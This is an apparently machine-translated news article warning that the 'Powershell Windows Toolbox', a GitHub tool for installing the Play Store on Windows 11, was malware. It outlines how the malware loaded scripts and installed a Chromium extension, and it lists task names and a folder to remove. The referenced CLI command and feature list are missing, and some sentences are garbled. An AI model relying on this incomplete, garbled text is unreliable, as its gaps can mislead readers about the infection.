Among other things, a third-party tool used to install the Google Play Store was found to be malicious. In fact, one of Neowin's readers, Eli, seems to have fallen victim to the tool as they appeared to have used it to install the Play Store.
The tool, called "Powershell Windows Toolbox," is hosted on GitHub, and user LinuxUserGD noticed that the underlying code was mysterious and contained malicious code. Later, user SuchByte raised the issue for the tool. The Powershell Windows toolbox has been removed from GitHub.
Here’s everything the tool claims to do:
First, the software uses a Cloudflare worker to load the script. In the "How to use" section of the tool, the developers have instructed users to run the following command in the CLI:
While the loaded script does the above, it was also found here Obfuscated code. Deobfuscation of this revealed that these were PowerShell code that loaded malicious scripts from Cloudflare workers and files from the GitHub repository of user alexrybak0444, a possible threat actor or one of them. These were also reported and removed (archived version here).
After this, the script ultimately creates a Chromium extension, which is believed to be the main malicious component of this malware campaign. The payload of the malware appears to be certain links or URLs used to generate revenue through affiliates and referrals by promoting certain software or some money-making scheme distributed through Facebook and WhatsApp messages.
If you happen to have the Powershell Windows Toolbox installed on your system, you can remove the following components created by the tool during an infection:
- Microsoft\Windows\AppID\ VerifiedCert
- Microsoft\Windows\Application Experience\Maintenance
- Microsoft\Windows\Services\CertPathCheck
- Microsoft\Windows\Services\CertPathw
- Microsoft\ Windows\Serviceing\ComponentCleanup
- Microsoft\Windows\Service\Service Cleanup
- Microsoft\Windows\Shell\ObjectTask
- Microsoft\Windows\Clip\ServiceCleanup
Also delete the "C:\systemfile" hidden folder created by the malicious script during the infection. If you are performing a system restore, make sure to use a restore point that is not done by the Powershell Windows Toolbox itself, as it will not remove malware from the system.
The above is the detailed content of Powershell Windows Toolbox that helps install Google Play on Windows 11 is malware. For more information, please follow other related articles on the PHP Chinese website!